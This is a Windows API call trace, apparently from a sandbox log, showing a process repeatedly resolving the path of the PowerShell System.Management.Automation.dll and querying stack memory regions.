	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.825] GetLastError () returned 0x0
	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.825] GetLastError () returned 0x0
	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.825] GetLastError () returned 0x0
	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.825] GetLastError () returned 0x0
	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.825] GetLastError () returned 0x0
	[0054.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.826] GetLastError () returned 0x0
	[0054.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.827] GetLastError () returned 0x0
	[0054.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.827] GetLastError () returned 0x0
	[0054.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.827] GetLastError () returned 0x0
	[0054.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.827] GetLastError () returned 0x0
	[0054.827] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.828] GetLastError () returned 0x0
	[0054.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.828] GetLastError () returned 0x0
	[0054.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.828] GetLastError () returned 0x0
	[0054.828] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.828] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.829] GetLastError () returned 0x0
	[0054.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.829] GetLastError () returned 0x0
	[0054.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.829] GetLastError () returned 0x0
	[0054.829] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.829] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.829] GetLastError () returned 0x0
	[0054.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.829] GetLastError () returned 0x0
	[0054.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.830] GetLastError () returned 0x0
	[0054.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.830] GetLastError () returned 0x0
	[0054.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.830] GetLastError () returned 0x0
	[0054.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.830] GetLastError () returned 0x0
	[0054.830] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.831] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.831] GetLastError () returned 0x0
	[0054.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.831] GetLastError () returned 0x0
	[0054.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.831] GetLastError () returned 0x0
	[0054.831] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.831] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.832] GetLastError () returned 0x0
	[0054.833] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.833] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.833] GetLastError () returned 0x0
	[0054.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.833] GetLastError () returned 0x0
	[0054.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.833] GetLastError () returned 0x0
	[0054.834] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.834] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.834] GetLastError () returned 0x0
	[0054.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.834] GetLastError () returned 0x0
	[0054.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.834] GetLastError () returned 0x0
	[0054.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
	[0054.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.835] GetLastError () returned 0x0
